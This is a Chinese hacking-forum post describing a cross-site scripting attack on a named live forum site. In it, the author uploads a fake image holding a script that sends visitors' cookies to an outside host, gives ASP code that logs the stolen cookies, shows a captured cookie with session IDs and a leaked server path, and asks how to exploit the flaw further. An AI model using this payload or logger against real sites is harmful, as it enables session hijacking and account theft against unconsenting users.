一、跨站测试

先看看我的一次跨站测试吧

我以职业欠钱的站点做测试吧:

Host:zhiyeqianqian.51web.cn

MyTest:

先在他的论谈上传两张图，

图一的内容是:

<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>

得到url为UploadFile/2005-6/200562716565777847.jpg

图二则是偶的个人照

UploadFile/2005-6/200562716563048909.jpg

写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题，所以修改了一下。

<%

cookiefile=Server.MapPath("cookie.txt")

setfs=server.CreateObject("scripting.filesystemobject")

setcookiefile=fs.OpenTextfile(cookiefile,8,True,0)

cookiefile.Write(Request.QueryString&"<br>")

cookiefile.close

setfs=nothing

%>

<METAHTTP-EQUIV="Refresh"CONTENT="0;URL=http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">

接下来，点击图一，自动转到图二，

二、结果分析

再到我的空间看一下，抓到cookie如下:

msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗？嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>

分析cookie我们不难看出他的绝对路径是e:wwwrootzhiyeqianqianwwwroot

三、论谈

本来，最初的测试我是在测试BCT论谈，成功暴出他的绝对路径，一开始的时候，我还认为可能又是动网出洞洞了，所以又去测试了其它几个站，测试结果是其它的站点并没有暴出路径，今天再次测试“欠我钱”的论谈，却又暴不出来，查了一下代码，和别人的代码一个样，根本没什么差别。

偶想听听大家的看法，到底是哪里出了问题，能不能深入利用~~~